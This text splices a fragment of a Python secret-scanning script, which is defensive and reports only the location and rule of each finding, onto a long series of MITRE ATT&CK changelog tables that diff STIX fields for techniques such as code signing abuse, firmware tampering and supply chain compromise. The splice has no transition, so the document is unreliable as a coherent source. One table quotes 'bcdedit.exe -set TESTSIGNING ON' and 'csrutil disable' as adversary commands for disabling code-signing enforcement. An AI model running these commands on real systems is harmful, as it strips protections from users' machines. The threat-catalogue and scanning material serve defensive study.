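    return None


def scan_repo(files):
    """files: mapping path -> text.  Findings carry location and rule only,
    never the matched value, so the report can be logged without re-leaking
    the credential."""
    findings = []
    for path, text in files.items():
        for lineno, line in enumerate(text.splitlines(), start=1):
            rule = classify_line(line)
            if rule:
                findings.append(Finding(path, lineno, rule))
    return findings


if __name__ == "__main__":
    for f in scan_repo(SAMPLE_REPO):
        print("%s:%d  %s" % (f.path, f.line, f.rule))
```

The fixed patterns catch the well-known formats (AWS key IDs, PEM blocks, credentials inside connection URLs); the entropy rule is what catches the secret access key, whose format has no distinctive prefix, while leaving `TOKEN = os.environ["API_TOKEN"]` alone because the assigned value is code rather than a literal. Run the same scan over `git log -p` output as well as the working tree, since a secret removed in a later commit is still collectable from history.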
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-16 01:35:43.483000+00:00 | 2022-10-18 22:44:01.723000+00:00 |
| description | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) | Adversaries may leverage code repositories to collect valuable information. Code repositories are tools/services that store source code and automate software builds. They may be hosted internally or privately on third party sites such as Github, GitLab, SourceForge, and BitBucket. Users typically interact with code repositories through a web application or command-line utilities such as git. Once adversaries gain access to a victim network or a private code repository, they may collect sensitive information such as proprietary source code or credentials contained within software's source code. 
Having access to software's source code may allow adversaries to develop [Exploits](https://attack.mitre.org/techniques/T1587/004), while credentials may provide access to additional resources using [Valid Accounts](https://attack.mitre.org/techniques/T1078).(Citation: Wired Uber Breach)(Citation: Krebs Adobe) **Note:** This is distinct from [Code Repositories](https://attack.mitre.org/techniques/T1593/003), which focuses on conducting [Reconnaissance](https://attack.mitre.org/tactics/TA0043) via public code repositories. |
| x_mitre_data_sources[0] | Logon Session: Logon Session Creation | Application Log: Application Log Content |
| x_mitre_data_sources[1] | Application Log: Application Log Content | Logon Session: Logon Session Creation |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. | Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-02-10 19:51:01.601000+00:00 | 2022-09-22 19:13:52.548000+00:00 |
| description | Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS/OS X systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. | Adversaries may create, acquire, or steal code signing materials to sign their malware or tools. Code signing provides a level of authenticity on a binary from the developer and a guarantee that the binary has not been tampered with. (Citation: Wikipedia Code Signing) The certificates used during an operation may be created, acquired, or stolen by the adversary. (Citation: Securelist Digital Certificates) (Citation: Symantec Digital Certificates) Unlike [Invalid Code Signature](https://attack.mitre.org/techniques/T1036/001), this activity will result in a valid signature. Code signing to verify software on first run can be used on modern Windows and macOS systems. It is not used on Linux due to the decentralized nature of the platform. (Citation: Wikipedia Code Signing)(Citation: EclecticLightChecksonEXECodeSigning) Code signing certificates may be used to bypass security policies that require signed code to execute on a system. |
| external_references[1]['source_name'] | Wikipedia Code Signing | EclecticLightChecksonEXECodeSigning |
| external_references[1]['description'] | Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016. | Howard Oakley. (2020, November 16). Checks on executable code in Catalina and Big Sur: a first draft. Retrieved September 21, 2022. |
| external_references[1]['url'] | https://en.wikipedia.org/wiki/Code_signing | https://eclecticlight.co/2020/11/16/checks-on-executable-code-in-catalina-and-big-sur-a-first-draft/ |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'Wikipedia Code Signing', 'description': 'Wikipedia. (2015, November 10). Code Signing. Retrieved March 31, 2016.', 'url': 'https://en.wikipedia.org/wiki/Code_signing'} |
| Description |
|---|
| Adversaries may modify code signing policies to enable execution of unsigned or self-signed code. Code signing provides a level of authenticity on a program from a developer and a guarantee that the program has not been tampered with. Security controls can include enforcement mechanisms to ensure that only valid, signed code can be run on an operating system. Some of these security controls may be enabled by default, such as Driver Signature Enforcement (DSE) on Windows or System Integrity Protection (SIP) on macOS.(Citation: Microsoft DSE June 2017)(Citation: Apple Disable SIP) Other such controls may be disabled by default but are configurable through application controls, such as only allowing signed Dynamic-Link Libraries (DLLs) to execute on a system. Since it can be useful for developers to modify default signature enforcement policies during the development and testing of applications, disabling of these features may be possible with elevated permissions.(Citation: Microsoft Unsigned Driver Apr 2017)(Citation: Apple Disable SIP) Adversaries may modify code signing policies in a number of ways, including through use of command-line or GUI utilities, [Modify Registry](https://attack.mitre.org/techniques/T1112), rebooting the computer in a debug/recovery mode, or by altering the value of variables in kernel memory.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP)(Citation: FireEye HIKIT Rootkit Part 2)(Citation: GitHub Turla Driver Loader) Examples of commands that can modify the code signing policy of a system include `bcdedit.exe -set TESTSIGNING ON` on Windows and `csrutil disable` on macOS.(Citation: Microsoft TESTSIGNING Feb 2021)(Citation: Apple Disable SIP) Depending on the implementation, successful modification of a signing policy may require reboot of the compromised system. Additionally, some implementations can introduce visible artifacts for the user (ex: a watermark in the corner of the screen stating the system is in Test Mode). Adversaries may attempt to remove such artifacts.(Citation: F-Secure BlackEnergy 2014) To gain access to kernel memory to modify variables related to signature checks, such as modifying `g_CiOptions` to disable Driver Signature Enforcement, adversaries may conduct [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) using a signed, but vulnerable driver.(Citation: Unit42 AcidBox June 2020)(Citation: GitHub Turla Driver Loader) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['Administrator'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-04-26 15:41:39.155000+00:00 | 2022-05-05 05:00:03.480000+00:00 |
| external_references[1]['source_name'] | Microsoft DSE June 2017 | Apple Disable SIP |
| external_references[1]['description'] | Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021. | Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN | https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection |
| external_references[2]['source_name'] | Apple Disable SIP | F-Secure BlackEnergy 2014 |
| external_references[2]['description'] | Apple. (n.d.). Disabling and Enabling System Integrity Protection. Retrieved April 22, 2021. | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. |
| external_references[2]['url'] | https://developer.apple.com/documentation/security/disabling_and_enabling_system_integrity_protection | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf |
| external_references[3]['source_name'] | Microsoft Unsigned Driver Apr 2017 | FireEye HIKIT Rootkit Part 2 |
| external_references[3]['description'] | Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021. | Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020. |
| external_references[3]['url'] | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html |
| external_references[4]['source_name'] | Microsoft TESTSIGNING Feb 2021 | Microsoft Unsigned Driver Apr 2017 |
| external_references[4]['description'] | Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021. | Microsoft. (2017, April 20). Installing an Unsigned Driver during Development and Test. Retrieved April 22, 2021. |
| external_references[4]['url'] | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/installing-an-unsigned-driver-during-development-and-test |
| external_references[5]['source_name'] | FireEye HIKIT Rootkit Part 2 | Microsoft DSE June 2017 |
| external_references[5]['description'] | Glyer, C., Kazanciyan, R. (2012, August 22). The “Hikit” Rootkit: Advanced and Persistent Attack Techniques (Part 2). Retrieved May 4, 2020. | Microsoft. (2017, June 1). Digital Signatures for Kernel Modules on Windows. Retrieved April 22, 2021. |
| external_references[5]['url'] | https://www.fireeye.com/blog/threat-research/2012/08/hikit-rootkit-advanced-persistent-attack-techniques-part-2.html | https://docs.microsoft.com/en-us/previous-versions/windows/hardware/design/dn653559(v=vs.85)?redirectedfrom=MSDN |
| external_references[6]['source_name'] | GitHub Turla Driver Loader | Microsoft TESTSIGNING Feb 2021 |
| external_references[6]['description'] | TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021. | Microsoft. (2021, February 15). Enable Loading of Test Signed Drivers. Retrieved April 22, 2021. |
| external_references[6]['url'] | https://github.com/hfiref0x/TDL | https://docs.microsoft.com/en-us/windows-hardware/drivers/install/the-testsigning-boot-configuration-option |
| external_references[7]['source_name'] | F-Secure BlackEnergy 2014 | Unit42 AcidBox June 2020 |
| external_references[7]['description'] | F-Secure Labs. (2014). BlackEnergy & Quedagh: The convergence of crimeware and APT attacks. Retrieved March 24, 2016. | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. |
| external_references[7]['url'] | https://blog-assets.f-secure.com/wp-content/uploads/2019/10/15163408/BlackEnergy_Quedagh.pdf | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ |
| external_references[8]['source_name'] | Unit42 AcidBox June 2020 | GitHub Turla Driver Loader |
| external_references[8]['description'] | Reichel, D. and Idrizovic, E. (2020, June 17). AcidBox: Rare Malware Repurposing Turla Group Exploit Targeted Russian Organizations. Retrieved March 16, 2021. | TDL Project. (2016, February 4). TDL (Turla Driver Loader). Retrieved April 22, 2021. |
| external_references[8]['url'] | https://unit42.paloaltonetworks.com/acidbox-rare-malware/ | https://github.com/hfiref0x/TDL |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_defense_bypassed | Application Control |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation | |
| x_mitre_defense_bypassed | Application control |
| Description |
|---|
| Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of [Unix Shell](https://attack.mitre.org/techniques/T1059/004) while Windows installations include the [Windows Command Shell](https://attack.mitre.org/techniques/T1059/003) and [PowerShell](https://attack.mitre.org/techniques/T1059/001). There are also cross-platform interpreters such as [Python](https://attack.mitre.org/techniques/T1059/006), as well as those commonly associated with client applications such as [JavaScript](https://attack.mitre.org/techniques/T1059/007) and [Visual Basic](https://attack.mitre.org/techniques/T1059/005). Adversaries may abuse these technologies in various ways as a means of executing arbitrary commands. Commands and scripts can be embedded in [Initial Access](https://attack.mitre.org/tactics/TA0001) payloads delivered to victims as lure documents or as secondary payloads downloaded from an existing C2. Adversaries may also execute commands through interactive terminals/shells, as well as utilize various [Remote Services](https://attack.mitre.org/techniques/T1021) in order to achieve remote Execution.(Citation: Powershell Remote Commands)(Citation: Cisco IOS Software Integrity Assurance - Command History)(Citation: Remote Shell Execution in Python) |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_permissions_required | ['User'] |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-08-16 21:03:21.700000+00:00 | 2022-04-19 18:31:48.827000+00:00 |
| external_references[1]['source_name'] | Powershell Remote Commands | Remote Shell Execution in Python |
| external_references[1]['description'] | Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021. | Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021. |
| external_references[1]['url'] | https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1 | https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python |
| external_references[3]['source_name'] | Remote Shell Execution in Python | Powershell Remote Commands |
| external_references[3]['description'] | Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021. | Microsoft. (2020, August 21). Running Remote Commands. Retrieved July 26, 2021. |
| external_references[3]['url'] | https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python | https://docs.microsoft.com/en-us/powershell/scripting/learn/remoting/running-remote-commands?view=powershell-7.1 |
| x_mitre_version | 2.2 | 2.3 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Metadata | |
| x_mitre_data_sources | Command: Command Execution |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Command: Command Execution |
| Description |
|---|
| Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program) A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-06-20 22:32:24.589000+00:00 | 2022-03-11 18:59:36.836000+00:00 |
| x_mitre_version | 1.0 | 2.0 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Process: Process Creation |
| Description |
|---|
| Adversaries may modify component firmware to persist on systems. Some adversaries may employ sophisticated means to compromise computer components and install malicious firmware that will execute adversary code outside of the operating system and main system firmware or BIOS. This technique may be similar to [System Firmware](https://attack.mitre.org/techniques/T1542/001) but conducted upon other system components/devices that may not have the same capability or level of integrity checking. Malicious component firmware could provide both a persistent level of access to systems despite potential typical failures to maintain access and hard disk re-images, as well as a way to evade host software-based defenses and integrity checks. |
New Mitigations:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-23 23:48:33.904000+00:00 | 2022-04-01 20:43:55.632000+00:00 |
| x_mitre_detection | Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) (Citation: SanDisk SMART) (Citation: SmartMontools) disk monitoring may reveal malicious manipulations of components. Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. Disk check and forensic utilities (Citation: ITWorld Hard Disk Health Dec 2014) may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation. Also consider comparing components, including hashes of component firmware and behavior, against known good images. | Data and telemetry from use of device drivers (i.e. processes and API calls) and/or provided by SMART (Self-Monitoring, Analysis and Reporting Technology) disk monitoring may reveal malicious manipulations of components.(Citation: SanDisk SMART)(Citation: SmartMontools) Otherwise, this technique may be difficult to detect since malicious activity is taking place on system components possibly outside the purview of OS security and integrity mechanisms. Disk check and forensic utilities may reveal indicators of malicious firmware such as strings, unexpected disk partition table entries, or blocks of otherwise unusual memory that warrant deeper investigation.(Citation: ITWorld Hard Disk Health Dec 2014) Also consider comparing components, including hashes of component firmware and behavior, against known good images. |
| x_mitre_version | 1.0 | 1.1 |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Driver: Driver Metadata | |
| x_mitre_platforms | Linux | |
| x_mitre_platforms | macOS |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Driver: Driver Metadata |
| Description |
|---|
| Adversaries may manipulate hardware components in products prior to receipt by a final consumer for the purpose of data or system compromise. By modifying hardware or firmware in the supply chain, adversaries can insert a backdoor into consumer networks that may be difficult to detect and give the adversary a high degree of control over the system. Hardware backdoors may be inserted into various devices, such as servers, workstations, network infrastructure, or peripherals. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['Sensor Health: Host Status'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-23 12:51:45.475000+00:00 | 2022-04-28 16:05:10.755000+00:00 |
| x_mitre_version | 1.0 | 1.1 |
| Old Description | New Description |
|---|---|
| Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_contributors | ['Jeremy Galloway'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2021-10-17 16:01:48.871000+00:00 | 2022-07-26 23:33:26.352000+00:00 |
| description | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) | Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage. Use of compromised infrastructure allows an adversary to stage, launch, and execute an operation. Compromised infrastructure can help adversary operations blend in with traffic that is seen as normal, such as contact with high reputation or trusted sites. For example, adversaries may leverage compromised infrastructure (potentially also in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004)) to further blend in and support staged information gathering and/or [Phishing](https://attack.mitre.org/techniques/T1566) campaigns.(Citation: FireEye DNS Hijack 2019) By using compromised infrastructure, adversaries may make it difficult to tie their actions back to them. Prior to targeting, adversaries may compromise the infrastructure of other adversaries.(Citation: NSA NCSC Turla OilRig) |
| external_references[1]['source_name'] | Mandiant APT1 | FireEye DNS Hijack 2019 |
| external_references[1]['description'] | Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016. | Hirani, M., Jones, S., Read, B. (2019, January 10). Global DNS Hijacking Campaign: DNS Record Manipulation at Scale. Retrieved October 9, 2020. |
| external_references[1]['url'] | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf | https://www.fireeye.com/blog/threat-research/2019/01/global-dns-hijacking-campaign-dns-record-manipulation-at-scale.html |
| external_references[3]['source_name'] | Talos DNSpionage Nov 2018 | Koczwara Beacon Hunting Sep 2021 |
| external_references[3]['description'] | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020. | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021. |
| external_references[3]['url'] | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2 |
| external_references[4]['source_name'] | FireEye EPS Awakens Part 2 | Mandiant APT1 |
| external_references[4]['description'] | Winters, R.. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016. | Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016. |
| external_references[4]['url'] | https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html | https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf |
| external_references[5]['source_name'] | NSA NCSC Turla OilRig | Talos DNSpionage Nov 2018 |
| external_references[5]['description'] | NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020. | Mercer, W., Rascagneres, P. (2018, November 27). DNSpionage Campaign Targets Middle East. Retrieved October 9, 2020. |
| external_references[5]['url'] | https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf | https://blog.talosintelligence.com/2018/11/dnspionage-campaign-targets-middle-east.html |
| external_references[6]['source_name'] | ThreatConnect Infrastructure Dec 2020 | NSA NCSC Turla OilRig |
| external_references[6]['description'] | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. | NSA/NCSC. (2019, October 21). Cybersecurity Advisory: Turla Group Exploits Iranian APT To Expand Coverage Of Victims. Retrieved October 16, 2020. |
| external_references[6]['url'] | https://threatconnect.com/blog/infrastructure-research-hunting/ | https://media.defense.gov/2019/Oct/18/2002197242/-1/-1/0/NSA_CSA_Turla_20191021%20ver%204%20-%20nsa.gov.pdf |
| external_references[8]['source_name'] | Koczwara Beacon Hunting Sep 2021 | ThreatConnect Infrastructure Dec 2020 |
| external_references[8]['description'] | Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with Shodan. Retrieved October 12, 2021. | ThreatConnect. (2020, December 15). Infrastructure Research and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021. |
| external_references[8]['url'] | https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2 | https://threatconnect.com/blog/infrastructure-research-hunting/ |
| x_mitre_version | 1.1 | 1.2 |
| STIX Field | Old value | New value |
|---|---|---|
| external_references | {'source_name': 'FireEye EPS Awakens Part 2', 'description': 'Winters, R. (2015, December 20). The EPS Awakens - Part 2. Retrieved January 22, 2016.', 'url': 'https://web.archive.org/web/20151226205946/https://www.fireeye.com/blog/threat-research/2015/12/the-eps-awakens-part-two.html'} | |
| x_mitre_data_sources | Domain Name: Active DNS |
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_data_sources | Domain Name: Active DNS |
| Old Description | New Description |
|---|---|
| Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency. (Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. | Adversaries may manipulate software dependencies and development tools prior to receipt by a final consumer for the purpose of data or system compromise. Applications often depend on external software to function properly. Popular open source projects that are used as dependencies in many applications may be targeted as a means to add malicious code to users of the dependency.(Citation: Trendmicro NPM Compromise) Targeting may be specific to a desired victim set or may be distributed to a broad set of consumers but only move on to additional tactics on specific victims. |
New Detections:
| STIX Field | Old value | New value |
|---|---|---|
| x_mitre_attack_spec_version | 2.1.0 | |
| x_mitre_data_sources | ['File: File Metadata'] | |
| x_mitre_deprecated | False | |
| x_mitre_domains | ['enterprise-attack'] | |
| x_mitre_modified_by_ref | identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 |
| STIX Field | Old value | New value |
|---|---|---|
| modified | 2020-03-11 14:13:42.916000+00:00 | 2022-04-28 16:03:59.172000+00:00 |
